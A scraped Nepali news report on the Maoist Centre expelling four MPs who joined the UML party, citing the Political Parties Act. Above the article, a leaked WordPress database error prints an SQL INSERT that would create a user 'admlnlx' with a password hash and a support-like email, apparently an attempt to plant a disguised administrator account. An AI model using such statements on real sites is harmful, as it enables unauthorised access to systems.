WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzsnADuNt0ZM5GWO5sitnA5sosjzk71', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 04:03:11', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । नेपाल कम्युनिष्ट पार्टी माओवादी केन्द्रले नेकपा एमाले प्रवेश गरेका चार सांसदलाई कारवाही गरेको छ । प्रतिनिधिसभा सदस्य टोपबहादुर रायमाझी, लेखराज भट्ट, प्रभु साह र गौरीशङ्कर चौधरीलाई पार्टीको साधारण सदस्य नरहने गरी कारवाही गरिएको जानकारी माओवादी केन्द्रले सङ्घीय संसद् सचिवालयलाई गराएको छ ।
राजनीतिक दल त्यागसम्बन्धी ऐन २०७३ को दफा ३१ र ३२ बमोजिम स्पष्टीकरण माग गरी मन्त्रिपरिषद्बाट फिर्ता आउन गरिएको निर्देशन अस्वीकार गरेकाले कारवाही गरिएको अध्यक्ष पुष्पकमल दाहाल‘प्रचण्ड’ले सङ्घीय संसद् सचिवालयलाई जानकारी गराएको छ ।
माओवादी केन्द्रको यही चैत १ र २ गते बसेको केन्द्रीय समितिको बैठकले अध्यक्ष दाहाललाई प्रत्यायोजित गरेको अधिकार बमोजिम रायमाझी, भट्ट, साह र चौधरीले दल त्याग गरेको निर्णय गरिएको जनाइएको छ । राजनीतिक दलसम्बन्धी ऐन २०७३ को दफा ३४ बमोजिम प्रतिनिधिसभामा पेश गर्ने निर्णयबमोजिम उहाँहरुलाई पार्टीको साधारण सदस्यसमेत नरहने गरी निस्काशन गरिएको हो ।
सांसदहरु रायमाझी, भट्ट र चौधरीले स्पष्टीकरण नदिएको र साहले दिएको स्पष्टीकरण चित्तबुझ्दो नभएको तथा राजनीतिक दलसम्बन्धी ऐनले तोकेको दायित्व उल्लङ्घन गरेको सङ्घीय संसद् सचिवालयमा माओवादी केन्द्रले गराएको जानकारी पत्रमा उल्लेख छ । रासस